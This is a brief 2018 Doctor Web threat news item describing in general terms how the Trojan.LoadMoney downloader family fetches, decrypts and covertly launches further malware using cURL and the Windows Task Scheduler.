Doctor Web: new downloader Trojans operate on the sly
March 6, 2018
The Trojan.LoadMoney malware family has been well known since 2013, and new representatives of this family appear regularly. One of these Trojans is Trojan.LoadMoney.3209. It contains two Internet addresses, which are used to download and launch other malware. At the time of the research, the Trojan downloaded an identically encrypted file from both addresses and saved it in a temporary folder under a random name. This file was also loaded onto the memory after it was deleted and again saved in a temporary folder, also under a random name. Finally, this executable file was read into memory and then launched. The original file was deleted.
One of the files that Trojan.LoadMoney.3209 downloads is detected as Trojan.LoadMoney.3558. This malicious program is more complicated. Trojan.LoadMoney.3558 acts as the main system infector and uses a freely distributed utility cURL for downloading files. This utility allows it to interact simultaneously with multiple Internet servers by using several different protocols. The Trojan decrypts and saves them to a disk. For downloading files to an infected computer with a cURL, Trojan.LoadMoney.3558 uses the Windows Task Scheduler. The Trojan contains four encrypted addresses of Internet resources, one of which is used to operate with the cURL utility; other addresses are used to download the executable file, named Trojan.LoadMoney.3263, which is launched covertly. Upon launching, the original file, Trojan.LoadMoney.3263, is deleted.
After downloading, the Trojan extracts the executable file, restores its header, saves it to a temporary folder, and then launches the executable file. The specified file is detected by Dr.Web as Trojan.Siggen7.35395. Because virus writers have not implemented any visual effects in the malicious code, all the mentioned Trojans do not manifest themselves in the infected system, so detecting their malicious activity is not easy.
Doctor Web virus analysts continue to examine this family of malicious programs and dangerous files. As we receive more news about this family, we will continue to inform our readers. Dr.Web anti-virus products securely protect against all known representatives of the Trojan.LoadMoney family, so they do not pose a threat to our users.#mining #Trojan
Tell us what you think
You will be awarded one Dr.Webling per comment. To ask Doctor Web’s site administration about a news item, enter @admin at the beginning of your comment. If your question is for the author of one of the comments, put @ before their names.